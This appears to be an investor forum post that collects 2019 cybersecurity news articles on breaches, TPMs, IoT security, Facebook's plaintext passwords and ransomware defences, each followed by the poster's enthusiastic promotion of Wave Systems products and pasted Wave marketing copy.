Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Register for free to join our community of investors and share your ideas. You will also get access to streaming quotes, interactive charts, trades, portfolio, live options flow and more tools.
Toyota announces second security breach in the last five weeks
https://www.zdnet.com/article/toyota-announces-second-security-breach-in-the-last-five-weeks/?ftag=COS-05-10aaa0g&utm_campaign=trueAnthem:+Trending+Content&utm_content=5c9e5d2c3ed3f00001722334&utm_medium=trueAnthem&utm_source=twitter
==================================================================
What makes this situation extraordinary is that Toyota is a TCG member and so was Wave!! With better cybersecurity potentially at its fingertips, its hard to believe that a fantastic company like Toyota didn't have the Wave cybersecurity solutions defensive arsenal. This situation could have been avoided with Wave solutions!!! Toyota and many other companies with similar defensive cybersecurity would do better by buying solutions from Wave Systems!! The website below really shows what excellent cybersecurity is all about!
==================================================================
https://www.wavesys.com/
The Wave Alternative is a great place to start:
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Protecting communication within the smart factory and to the cloud: Infineon presents the world’s first TPM 2.0 for Industry 4.0
https://securityboulevard.com/2019/03/protecting-communication-within-the-smart-factory-and-to-the-cloud-infineon-presents-the-worlds-first-tpm-2-0-for-industry-4-0/
Munich, Germany – 27 March 2019 – Infineon Technologies AG (FSE: IFX / OTCQX: IFNNY) presents the world’s first Trusted Platform Module (TPM) specifically for industrial applications at this year’s Hannover Messe (Hannover, Germany, 1-5 April 2019). The OPTIGA™ TPM SLM 9670 protects the integrity and identity of industrial PCs, servers, industrial controllers or edge gateways. It controls access to sensitive data in key positions in a connected, automated factory as well as at the interface to the cloud.
The TPM acts as a vault for sensitive data in connected devices and lowers the risk of data and production losses due to cyber attacks. Users’ benefit is not limited to security only as TPMs also help to shorten time to market and reduce costs for industrial applications. Through the use of Infineon’s audited and certified TPMs, manufacturers of industrial devices can achieve higher security levels of the IEC 62443* standard and accelerate their certification processes. Furthermore, they can cut costs for maintenance of the devices through secured remote software updates.
The OPTIGA TPM SLM 9670 fully meets the TPM 2.0 standard of the Trusted Computing Group and is certified by an independent test lab in accordance with Common Criteria**. With a service life of 20 years and the ability to update the firmware on the chip, the TPM is able to cope with long-term security risks that may be encountered in an industrial environment. The chip boasts an extended temperature range of -40° to 105° Celsius and meets the stringent requirements of industry in terms of robustness and quality as it is qualified according to the industrial JEDEC JESD47 standard.
Availability
The OPTIGA TPM SLM 9670 is manufactured at Infineon’s security-certified facilities in Germany and will be available in large volumes from the second half of 2019. For more information please go to www.infineon.com/industrial-tpm
Infineon at the Hannover Messe
The Internet of Things is increasing the fields of application for the TPM. With its extensive OPTIGA TPM product family, Infineon offers application-specific solutions for business PCs and routers, connected vehicles, or cloud applications.
The OPTIGA TPM SLM 9670 will be presented for the first time at this year’s Hannover Messe, the world’s leading industrial show. Infineon will show various products and a demonstrator for energy-efficient and secured smart factories at the stand of Amazon Web Services (Hall 6, Stand F46). This demo includes also an edge gateway which is a perfect place for the strong security of the OPTIGA TPM SLM 9670 because of the gateway’s central and security-critical function in industrial networks.
* IEC 62443 is an international series of standards that defines the IT security requirements for industrial communication networks.
**Common Criteria is an international standard for computer security certification.
=================================================================
Another great application for the Trusted Platform Module (TPM)! The TPM could be protecting billions of devices from cyber attacks if turned on!! TPM 1.2 and TPM 2.0 turned on are better than software security alone! With all the cyber attacks occurring on a daily basis, it makes sense that both TPM versions should be activated en masse. Wave has an opportunity to be the 'beacon of light' on these activations, and the great solutions they have involving the TPM!!!
==================================================================
https://www.wavesys.com/
What is Wrong with IoT Security Today?
https://www.infosecurity-magazine.com/opinions/wrong-iot-today-1/?utm_source=dlvr.it&utm_medium=twitter
The list of Internet of Things (IoT) is growing quickly, and so are the security concerns. As more devices get connected to the internet, the network expands and volumes of data increase, putting more sensitive information at risk.
Currently, most IoT devices have poor security in place. In fact, most IoT device manufacturers ship devices with a default password and don’t give the customers an option to change it. According to the 2019 Internet Security Threat Report, targeted attack groups are increasingly focused on IoT as a soft entry point, where they can destroy or wipe a device and steal credentials and data. Although routers and connected cameras make up 90% of infected devices, almost every IoT device from smart light bulbs to voice assistants is vulnerable, according to the report.
Today, many companies are using home brew passwords and “tricks” in their software, both of which make them inherently insecure. Some are using symmetric encryption, but then the “password” is the same across all devices. Hack one, you can hack them all.
Many organizations are using Public Key Infrastructure (PKI), but doing so without thinking beyond the next couple of years. While others aren’t thinking about changing crypto needs and lifetime issues down the road.
Why Consider PKI?
The rise of the IoT is driving the deployment of applications using PKI, with 43% of IoT devices expected to rely primarily on digital certificates in the next two years, according to the 2018 Global PKI Trends Study. A well-designed PKI combines roles, policies, software, and hardware elements to enable secure electronic transfer of information—far more securely than what is possible with simple password authentication.
Why is PKI a good choice for IoT? PKI is a disconnected verification system; there is no need for a centralized server. Devices that are participating in the same PKI can valid each other’s identities and encrypt information just from exchanging their certificates. These certificates can have cryptographic keys that have validity periods that far exceed the usable lifetime of any other authentication systems.
Security is Not One Size Fits All
Security needs for devices are different. I recently spoke with Jeff Stapleton, co-author of Security without Obscurity: A Guide to PKI Operations about the importance of a holistic approach to PKI. Stapleton explains that the sensitivity of the data, the longevity of the information, and now privacy all need to be considered and addressed by the PKI in its design, operations, and management.
This applies to IoT devices at all levels. When factoring in security, developers of IoT devices need to consider the longevity of the key exchange and consider the lifetime of the device: for example if a device has a 10-year lifecycle, a 50-year lifecycle (and cannot be updated), etc.
Securing devices over their lifetimes is critical to the safety and use of these devices, regardless of how they are used. The lifetime of an IoT device can range from short-lived devices (temperature sensor) to a device with a long lifespan, designed to last 100 years (water pump), which makes creating and managing a security infrastructure for IoT systems incredibly complex.
It also cannot just be what works for today’s customer. IoT manufacturers need to take a holistic approach and look at how long these devices will be in the field and how they can expect to find a security process that will stand the test of time or allow them to field upgrade. In addition, manufacturers have to think 10-15 years down the road and think about how their devices today will interoperate with their device security for things they haven’t even developed yet.
A single approach to security and device lifetime can’t work for all devices. Many commercial solutions and cloud providers that provide cloud-based identities consider 40 years to be “long enough.” In fact, I had to chase AWS down as the company was reporting “lifetime identities.” This is impossible, it turned out it was 42 years maximum. Long-life devices need to be built to withstand cryptographic changes – what is secure today won’t be ten years from now, let alone in 50 years.
Five Security Goals Companies Need
Devices need to be built to interoperate with each other. A device sold today that is expected to be used for ten years is likely to encounter a newer release from the manufacturer, and that older and newer model may need to interoperate cohesively during the supported lifetime. Here are the top five security goals that I recommend that companies put into practice:
1 Cryptography must be not just secure enough for today, but companies need to think through the device lifecycle across the current generation and interacting with future generations. At PKI Solutions, one thing that we have done is pre-create a future CA that has cryptography keys we expect to be common 20 years from now. We bake that identity into the trusted list of devices today, so when new devices come out they are already trusted.
2 Devices using RSA keys should expect those keys to be renewed on a regular basis. Best practice is to renew every two-three years. Computationally, they can be used for longer periods of time in controlled environments. Elliptic curve cryptography (ECC)-based encryption can provide longer period of expected validity.
3 Devices that will be used and deployed in isolated environments (heavy machinery, industrial controls, secure environments) must have enough intelligence to roll keys and validate identities from other compatible devices. Manufacturers need to make sure firmware and other updates have a method to trigger changes to new cryptography and trust chains
4 Hardware protection is critical to IoT. Long lived keys will always be vulnerable. They are in use too long not to be examined and the potential for exploit is huge. Using Trusted Platform Module (TPM)-embedded silicon to secure identities is the best method. Storing identities and keys in firmware or software will never be secure enough.
5 Avoid self-signed certificates to authenticate devices. It is inherently insecure and provides little to authenticate a valid host to a user or another device. It also trains users to ignore certificate and identities errors. Manufacturers should strive to ensure their identities are trusted from the first use of their device.
=================================================================
There seems to be a large concern to have IOT devices properly secured. Shouldn't there be a large concern as well on TPMs (hardware) not being turned on in computers?! And as this author indicates for IOT devices using TPMs to secure identities is the best method and hardware is better than software for storing identities.
=================================================================
https://www.wavesys.com/
Insurers Collaborate on Cybersecurity Ratings
https://www.darkreading.com/risk/insurers-collaborate-on-cybersecurity-ratings/d/d-id/1334258
A group of insurers will base rates and terms on whether customers purchase technology that has earned a stamp of approval.
It's in the best interest of insurance companies to have their customers protected from cybersecurity losses. That, in a nutshell, is why a number of global insurers are collaborating on a rating system for cybersecurity products.
According to The Wall Street Journal, Marsh & McLennan, a professional services company specializing in risk and insurance, will evaluate enterprise cybersecurity technology in a program called "Cyber Catalyst." The article states, "Marsh will collate scores from participating insurers, which will individually size up the offerings, and identify the products and services considered effective in reducing cyber risk."
Companies that choose security products from among the approved selection may find themselves qualified for improved insurance terms and conditions. Insurers already signed up to participate include Allianz SE, AXA SA, Axis Capital Holdings Ltd, Beazley PLC, CFC Underwriting Ltd., Munich Re, Sompo International, and Zurich Insurance Group AG.
=================================================================
AXA and Wave could show the other insurers how tremendous Wave VSC 2.0 is, (read article below) and the insurers could give Wave VSC 2.0 more than just a stamp of approval!!
==================================================================
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Lee, MA -
December 17, 2015 -
Wave Systems Corp. (NASDAQ: WAVX) announces a five-year master licensing agreement (MLA) with a leading global corporation (as determined by the 2015 Fortune Global 500 List) for its Virtual Smart Card 2.0 solution. This MLA sets the terms and pricing for licenses and maintenance across the customer’s global organization and establishes it as their preferred two-factor authentication solution. Instead of one large license purchase for the entire organization, each of the customer’s subordinate divisions will make separate orders in accordance with the terms of this MLA.
The first purchase of 2,000 VSC 2.0 licenses under this agreement, when added to a previous purchase, completes the requirement for the customer’s global IT division. That division will now lead the internal effort to standardize the remaining 150,000+ endpoints within their organization with the new Wave VSC 2.0 solution. While there are no minimum order requirements under the agreement, discussions for additional orders are underway.
“Our five-year agreement with this customer is the first very large scale contract for VSC 2.0 and is an important milestone for Wave,” said Bill Solms, President and CEO of Wave Systems. “This customer is a major global financial services company and their standards for protecting their systems from unauthorized access and the integrity of their data are of the highest order. Wave had to pass a very rigorous technical and business review to win the competition. We believe that this client’s decision to choose Wave Virtual Smart Card 2.0 over their incumbent solution gives us tremendous credibility in the two-factor authentication market. We will remain engaged with this company in order to complete the additional sales and deployments in the months ahead.”
Wave Virtual Smart Card 2.0 is a tokenless, hardware-based, two-factor authentication solution that offers superior security at less than half the cost of comparable solutions. It is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7, 8 and 10. It also provides management support for the Microsoft Virtual Smart Card on Windows 8 and 10. Wave’s VSC solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, significantly lower total cost of ownership, and a greatly reduced risk of unauthorized access.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure Passphrase and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with both TPM 1.2 and TPM 2.0 security chips
For more information, visit: Wave Virtual Smart Card 2.0
https://www.wavesys.com/
Orgs Grapple with Pros and Cons of Remote Workers
https://www.infosecurity-magazine.com/news/orgs-grapple-with-pros-cons-of-1?utm_source=twitterfeed&utm_medium=twitter
Despite the growing number of employees that work remotely, security professionals fear that remote workers pose risks to the enterprise, according to a new study published by OpenVPN.
An overwhelming majority (90%) of survey respondents said that remote workers are a security risk to the organization, according to the report Remote Work Is the Future – But Is Your Organization Ready for It? The report’s findings are based on a survey of 250 IT leaders, from the manager level through the C-suite.
Still, 92% of respondents agreed that the benefits of remote work outweigh the security risks. “For employees, it provides greater efficiency and lower stress levels: 82% of telecommuters reported less stress and 30% said it allowed them to accomplish more work in less time,” the report said. In addition, companies reportedly save an average of $11,000 per year per remote employee.
Despite the fact that 93% of organizations have a remote work security policy in place and 90% of organizations offer security training for remote workers, more than a third (36%) of companies have experienced a security incident due to a remote worker. That more than one in three organizations have suffered a security incident because of a remote worker is somewhat alarming when considering that nearly 70% of employees globally now work remotely at least once a week, the report said.
Of those who have suffered a security incident, 68% experienced it within the last year, yet the survey shows that nearly a quarter of organizations (24%) haven’t updated their remote work security policy in the same time frame.
While less than half (49%) of IT leaders said they only somewhat agreed that remote employees adhere to the organization’s remote work policies, the results vary depending on the role of the respondent. “Executives are particularly concerned about the risk remote workers pose, as nearly three-quarters (73 percent) of VP and C-suite IT leaders believe remote workers pose a greater risk than onsite employees, compared to 48 percent of IT managers and 45 percent of IT directors,” the study found.
=================================================================
Apparently more than 1/3 or (36%) haven't heard of Wave VSC 2.0 and Wave SED management or they're not using it. These two solutions from Wave could cut down on the security incidents these companies are having!!! When Wave VSC 2.0 is used, a hacker needs the PIN and would also need the remote worker's computer (TPM) to login to the company network. The PIN is much more difficult to obtain (in TPM) than usernames and passwords that are plentiful on the Dark Web.
A lost PC by a remote worker can be protected by being fully encrypted (SED). These SEDs can be managed by Wave SED management.
Wave has other solutions that could be beneficial to companies and their remote workers!!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/
Some Windows 7, 8.1 users reporting Security Essentials and Windows Defender problems
https://www.zdnet.com/article/some-windows-7-8-1-users-reporting-security-essentials-and-windows-defender-problems/
Some Windows 7 and 8.1 users are noticing that their automatic anti-malware protection has been turned off and are seeing out-of-date virus definitions. A definition update fix is available now.
A number of Windows 7 and 8.1 users are encountering problems with Microsoft Security Essentials and Windows Defender. Users are seeing their automatic anti-malware protection turned off without their knowledge and are seeing out-of-date virus definitions. The problem is happening with some, but not all, users for the past several hours. Windows 10 users don't seem to be affected.
I just tried running a manual Security Essentials scan on my Windows 7 SP1 desktop machine and got error message 0x800106ba. I, like others reporting the issue, received a warning that my PC couldn't be scanned and my ant-malware service had stopped.
Microsoft Security Essentials provides a fuller range of protection against malicious software than Windows Defender. MSE is meant to protect against viruses, worms, Trojans, rootkits, spyware and more.
I have no idea how many users are affected, but saw early reports of this on AskWoody.com. There are more reports of the same issue on the Microsoft.com Answers site. Some System Center Endpoint Protection users also are reporting problems and have been guessing that a faulty virus definition could be the culprit.
I'm hearing from sources that an definition update that will fix the issue should be out in the next hour or so (by 3 pm ET or so). And that the problem, introduced in signatures 1.289.1521.0 could be mitigated in signatures 1.289.1587 or newer.
I've asked Microsoft for official comment. No word back so far.
Update (March 19, 8 pm ET): "We've resolved this issue, which appears to have been limited to Windows 7 and Windows Server 2008," said a Microsoft spokesperson via an emailed statement. The spokesperson didn't mention the updated definition that's now available, but here's information on 1.289.1588.0, posted by Microsoft on March 19. Just a reminder, Microsoft, that you've promised to support Windows 7 for free until January 14, 2020....
Yesterday, March 18, a number of IT administrators were reporting sync issues with Windows Server Update Services (WSUS). That issue also may have had something to do with virus definitions. (Thanks to @d_vickery on Twitter for that reminder.)
==================================================================
Given the problems reported with Security Essentials and Windows Defender, a comprehensive anti-malware solution like Wave Endpoint Monitor could spot the sneaky attacks and be working when a situation like this arises or replace Security Essentials and Windows Defender altogether.
==================================================================
https://www.wavesys.com/malware-protection
https://www.wavesys.com/products/wave-endpoint-monitor
Government cyber security strategy is ‘chaotic’
https://www.computerweekly.com/news/252460018/Government-cyber-security-strategy-is-chaotic
Excerpts:
The UK cyber security strategy is in a “chaotic” state, shadow Cabinet Office minister Jo Platt has said.
Speaking at the ICT Public Sector event yesterday (21 March 2019), Platt told the audience the security measures in place to protect the UK against a cyber attack were insufficient.
“It’s clear that we need a new strategy. We cannot wait for another WannaCry or worse before we take action. We know a crippling attack is coming our way – the questions is when, not if – and when it does, a Labour government will be ready for it,” Platt said
=================================================================
Wave solutions could be an enormous help with a newly improved UK cybersecurity strategy!!
=================================================================
https://www.wavesys.com/
Change your Facebook password now!
https://nakedsecurity.sophos.com/2019/03/21/change-your-facebook-password-now/
Oh, feet of clay!
Facebook has just admitted that it has found many places – hundreds of millions of places, maybe – where it saved users’ passwords to disk in raw, unencrypted form.
In jargon terms, they’re known as plaintext passwords and it means that instead of seeing a password scrambled into a hashed form such as 379f1531753a7c43ab4f4faace212451, anyone looking at the stored data will see the actual password, right there, just like that.
Like that: 123456789, or that: mypassword99, or that: jw45X$/6FsT8.
Plaintext passwords used to be commonplace, decades ago, but it’s become technically, socially and even morally irresponsible to save raw passwords over the years, a bit like drink-driving has become not only a statutory offence but also outright unacceptable on the road.
In other words, it used to be the norm; then it was the thing you only did if you thought you wouldn’t get caught; and today it’s something that gets the book thrown at you, given that it’s so easy to get it right and so risky to get it wrong.
How did Facebook make such a basic mistake?
The good news is that the wrongly stored passwords don’t seem to be part of Facebook’s externally-accessible authentication system.
In other words, the Facebook gateway servers that let outside users log in aren’t festooned with raw copies of everyone’s passwords.
Instead, it looks as though some Facebook programmers have, over the years – back to 2012, according to cybersecurity journalist Brian Krebs – been careless when writing logfile entries.
In other words, instead of securely disposing of password data from memory after it’s been used to verify a login, they’ve allowed that data to stick around for a while, where it’s ended up in one or more logfiles where it simply didn’t need to be recorded, and shouldn’t have been.
It’s OK to keep access data such as username, timestamp, browser type, country and so on…
…but programmers are duty bound to dispose of data carefully and promptly if it isn’t supposed to be stored after it’s served its purpose.
Like passwords.
The idea is simple: if you bump password data out of memory the instant that you no longer absolutely require it, then no one else can accidentally leak it later on.
Simply put, you can’t lose data you don’t have.
How bad is this?
Apparently, correctly bumping password data out of memory didn’t always happen in Facebook’s code.
As a detailed audit by Facebook now reveals, littered amongst the ziggabytes of data on its grillions of servers, millions of passwords inadvertently saved to disk where they should never have been.
According to Krebs:
A written statement from Facebook provided to KrebsOnSecurity says the company expects to notify “hundreds of millions of Facebook Lite users, tens of millions of other Facebook users, and tens of thousands of Instagram users.”
Facebook Lite is a stripped-down flavour of Facebook used in countries where mobile data plans are hard to come by and expensive.
Should I close my Facebook account?
We can’t answer that for you.
Given that the wrongly stored passwords weren’t easily accessible in one database, or deliberately stored for routine use during logins, we don’t think this breach alone is enough reason to terminate your account.
On the other hand, it’s a pretty poor look for Facebook, and it might be enough, amongst all the other privacy concerns that have dogged Facebook in recent years, to convince you to take that final step.
In short, we’re not advising you to close your account, but we are suggesting you factor this lapse in coding quality into your overall decision on what to do next.
But you have to decide for yourself. (For what it’s worth, we’re not closing our account.)
Should I change my Facebook password?
Why not?
It’s perfectly possible that no passwords at all fell into the hands of any crooks as a result of this.
But if any passwords did get into the wrong hands (and you can bet your boots that the crooks are trawling through any old data they might have right now, to see if there is anything they missed before!), then they are ready for abuse right away.
Hashed passwords still need to be cracked before they can be used; plaintext passwords are the real deal without any further hacking or cracking needed.
So our advice is: dont wait for Facebook; change your password now. (We already did!)
Should I turn on two-factor authentication?
Yes.
We’ve been urging you to do this everywhere you can anyway – it means that a password alone isn’t enough for crooks to raid your account.
If you are reluctant to give Facebook your phone number, use app-based authentication, where your mobile phone generates a one-time code each time you log in.
So we say: turn on 2FA now. (We did it ages ago!)
The short version
• Change your Facebook password now. Don’t wait for Facebook to contact you.
• Turn on 2FA if you haven’t already. It’s a small inconvenience for a big jump in security.
Then you can figure out whether you want to ditch your account, without making a snap decision you might later regret.
==================================================================
Years ago Wave, Bill Solms, and Steven Sprague would have been very interested in an article like this. Wave Solutions could strongly benefit the market with solutions like Wave VSC 2.0 and Wave Knowd (in retirement)!! Wave has remarkable solutions and cybersecuriy articles continue to reinforce that!! I think Wave solutions were actually ready ahead of its time!!
==================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/buzz/pr/wave-knowd-introduces-new-model-internet-authentication-without-passwords
Less Than 3% of Recycled Computing Devices Properly Wiped
https://www.darkreading.com/vulnerabilities---threats/less-than-3--of-recycled-computing-devices-properly-wiped/d/d-id/1334208?_mc=sm_iwfs_editor_kellysheridan
Researchers find that companies that refurbish or accept old equipment as donations don't necessarily clean them of data as promised.
Here's some eyepopping data about the computing devices that wind up at businesses that refurbish computers or accept donated devices: Out of 85 devices tested by researchers at Rapid7, only two were wiped properly – and three were encrypted.
Tod Beardsley, director of research at Rapid7, says the study was the brainchild of Josh Frantz, a senior security consultant at Rapid7, who made the project a labor of love on nights and weekends.
Frantz tested desktops, laptops, removable media, hard drives, and cell phones from 31 businesses around his home in Wisconsin. He spent about $600 on the equipment. At the end of the six-month project, he found that many of the refurbishing and donation businesses don't actually wipe data from those devices as promised.
"One of the big problems with the devices that wind up at these place is that it's often hard to distinguish between work and personal devices today because so many people mix their personal and work lives," Beardsley says. "From an IT perspective, it's really important for corporate IT departments to set a policy that when the company refreshes devices that they all get wiped before the employee receives the new device. And for personal devices like a smartphone, it's much easier today to wipe a phone and return it to the factory settings."
In a blog posted by Rapid7 earlier this week, Frantz reported some of his findings. Data found on the exposed devices included the following:
•41 Social Security numbers
•19 credit card numbers
•Two passport numbers
•147,000 emails
•214,000 images/photos
Frank Dickson, a research vice president at IDC, says it's actually surprising that Rapid7 found any computers that were properly wiped. He says companies should be careful about everything from old ATM machines (not all ATMs are properly managed by banks), printers, fax machines, computers, and smartphones.
"With printers, for example, the company may have it on a lease so they have to be sure to wipe the data on those printers before it goes back to the leasing company," Dickson says. "While it’s not clear how large a threat vector this is, the opportunity is there. This is one of easiest security issues to solve. You just have to remove the threat.
"If you don't have time to wipe the device, use a hammer."
==================================================================
If companies initialized their SEDs with Wave SED management then when the hard drives came to their 'end of life', the companies could crypto-erase the drives for recycling or retirement. That crypto-erase process is much more efficient than other techniques on the market!! Helping to stop ransomware is another great feature of the SED and Wave SED management!! Wave SED management should be on the hot list of a LOT of companies!
==================================================================
https://www.wavesys.com/products/wave-self-encrypting-drive-management
Excerpts:
Enterprises choose Wave to manage SEDs
Why? From our single console, you can manage all your organization’s self-encrypting drives (SEDs) easily and remotely, whether they number in the hundreds, or hundreds of thousands.
SEDs are the most secure, best-performing and most transparent encryption option for protecting data on laptops. These drives automatically encrypt all data written to the drive, so you don’t have to decide what’s important enough to encrypt. They also perform this encryption in the hardware of the drive, so you don’t end up with the performance issues software full-disk encryption is infamous for. SEDs are available as HDD or SSD, and are sold by most major drive manufacturers.
Wave’s management solution delivers remote drive initialization, user management, drive locking, user recovery and crypto-erase for all Opal-based, proprietary and solid-state SEDs.
Montreal researchers develop a new method to protect against ransomware attacks
https://www.concordia.ca/news/stories/2019/03/20/montreal-researchers-develop-a-new-method-to-protect-against-ransomware-attacks.html
Data deletion malware can be devastating but also thwarted, says Concordia professor Mohammad Mannan
When the WannaCry attack in May 2017 compromised hundreds of thousands of computers worldwide, it was among the biggest such ransomware campaigns on record. Besides countless individual users, organizations like the United Kingdom’s National Health Service, FedEx, Honda, as well as government ministries in Russia, India and elsewhere were affected.
Ransomware is not new, but the scope of the WannaCry attack and others that followed has cybersecurity experts worried. Ransomware is a form of malicious software that encrypts or can even destroy valuable files stored on a computer’s hard drive. Users who find their files encrypted usually receive a message demanding payment — a ransom, usually in the form of one cryptocurrency or another — to descramble the files.
While the most up-to-date operating systems (OS) are equipped with sophisticated anti-malware defenses, no system is immune from outside interference. However, Mohammad Mannan, associate professor at the Gina Cody School of Engineering and Computer Science, with his former PhD student Lianying Zhao, has recently developed a new method of protecting systems against these kinds of attacks.
The method, which he dubbed Inuksuk, uses hardware instead of software to protect sensitive data. Essentially, he has designed a method in which a pre-installed self-encrypting drive (SED) creates a partition that is protected by a high-entropy keyword. Even the user does not know the randomly generated keyword, and it is unique to the machine in which it is operating.
Once the Inuksuk program is installed, the SED pairs with a Trusted Platform Module (TPM) chip attached to the computer’s central processing unit. The TPM will block any process other than the valid Inuksuk program from accessing the SED keyword. Both the SED and TPM are common chips manufactured by major hardware companies.
A protected partition
The partition is a safe, tamper-proof location where data can be stored. If a user wants to write a file into it, they need access to the protected keyword, which is available only to the unmodified Inuksuk software. Inuksuk targets writing operations, so files can be read but not modified — thus thwarting encryption attempts by malware.
“Having a partition like this protects the files that are very special to you — the kind you really don’t want to lose in a ransomware attack,” says Mannan, who works at the Concordia Institute for Information Systems Engineering. “When you get infected, this software ensures that the ransomware can delete anything it likes from your regular partition but it cannot erase anything from your protected partition.”
Inuksuk will also freeze a computer’s operating system while it is running. Any malware that has made its way into the OS will be inactive while files in the protected partition are being modified. However, a computer that is linked to a network can run Inuksuk and its OS simultaneously.
“When your OS is compromised, none of the other solutions that currently exist, either in academia or industry, can survive in any effective way,” Mannan explains.
“Our primary goal was to protect computers from ransomware or any other data deletion attacks and also from rootkit level attacks.”
As for the name, Mannan says he borrowed the word “inuksuk” from the Inuit language of Inuktitut. “It has several meanings, and one of them is to indicate a place where you store food or other valuable things,” he says. “It’s a marker for people so they can find something important. We use it as a marker for your important data.”
==================================================================
Is Mohammad Mannan's idea novel or did Robert Thibadeau (ex-Wave VP) already have a way to stop ransomware using a SED? Mannan's idea makes use of the TPM and SED!! - Two of Wave's strongsuits. It seems that Wave managing both the TPM and SED would be instrumental here.
=================================================================
https://www.wavesys.com/wave-alternative
The IT perimeter is gone
With tablets, smartphones, and cloud applications, your employees can access sensitive data anytime, from anywhere. Indeed, around 70 percent of security breaches and data thefts are inside jobs. Meanwhile, the hackers only get better: advanced persistent threats (APTs) appear as normal traffic, and malware can go unnoticed for weeks.
It’s a new world, one without borders. Yet most organizations are still trying to protect their data with the same old firewalls and antivirus software. It’s not working. We refer you to the headline-making breach of the week.
You have to start with the device
Wave has an alternative: security that’s built into each and every device.
We’re talking about hardware: self-encrypting drives (SEDs), which protect data when a device is stolen or lost, and trusted platform modules (TPMs), or embedded security chips. Both go in at the factory, and increasingly, both are standard. They make it possible for you to monitor and control each individual device and its data, no matter where it is. But you need software to turn on and manage your SEDs and TPMs. Wave makes that software.
We’ve been refining comprehensive, centralized management of hardware-based security longer than anyone else. More than that, we’ve shaped the field as a founding member of the Trusted Computing Group, the not-for-profit that develops and promotes industry standards for the hardware.
Security that’s confirmed, not assumed
With Wave, you’ll know that you’re secure. Because we start with the individual devices, you get a broad, deep view of your network. You can see exactly who’s on it, with what devices and what apps, at any given time. Just for example, if Bob goes home and tries to log onto Facebook with the company laptop, Wave can stop him.
A big piece of this heightened security is device authentication. Traditional two-factor authentication requires what amounts to two user IDs. But by using the TPMs inside your devices, Wave can confirm the identity of not only users, but also the devices they’re on. Combine that with fast, enforced encryption of sensitive data via your SEDs—all easily managed with Wave software—and your data is protected from the full range of modern risks: device theft, missent emails, flash drives, portable hot spots … even (and no one else can say this) hardware keyloggers. Not to mention Bob.
Do we need to say that with Wave, compliance is no problem?
Start closing your security gaps today, with what you’ve got
You might be surprised to hear that 90 percent or more of your computers probably already have TPMs. Mobile devices are catching up fast. SEDs are newer, but you probably have a bunch of those too. Machines that don’t have them can often be outfitted at little to no extra cost. So you’ve got some or all of the hardware. All you need to do is turn it on with Wave.
It’s almost as easy as it sounds. TPMs and SEDs are built to open, vendor-neutral industry standards, and so are Wave solutions. That means Wave works on your existing mix of hardware, across platforms, and will evolve with you. It’s part of what makes the Wave alternative not only more secure, but also simpler and cheaper. Total cost of ownership for Wave data protection can be almost half that of a traditional software-based system.
Questions? Read on, or contact our sales department.
Nielsen warns US 'not prepared' for foreign cyberattacks
https://thehill.com/policy/cybersecurity/434554-nielsen-us-is-not-prepared-for-foreign-cyberattacks
Homeland Security Secretary Kirstjen Nielsen on Monday called for the U.S. to take on a “whole of society” approach to combat cyber threats, saying the U.S. “is not prepared” to handle hackers backed by other countries.
“It’s not just U.S. troops and government agents on the frontlines anymore,” Nielsen said at a speech at George Washington University. “It’s U.S. companies. It’s our schools and gathering places. It’s ordinary Americans.”
The Department of Homeland Security (DHS) chief said that as hackers target the devices of all Americans, “your average private citizen or company is no match against a nation-state such as China, Iran, North Korea or Russia.”
“It is not a fair fight,” Nielsen continued. “And until now our government has done far too little to back them up.”
American officials have pointed to hackers backed by countries like Russia, China and North Korea as presenting a major threat to the U.S., including potentially interfering in elections.
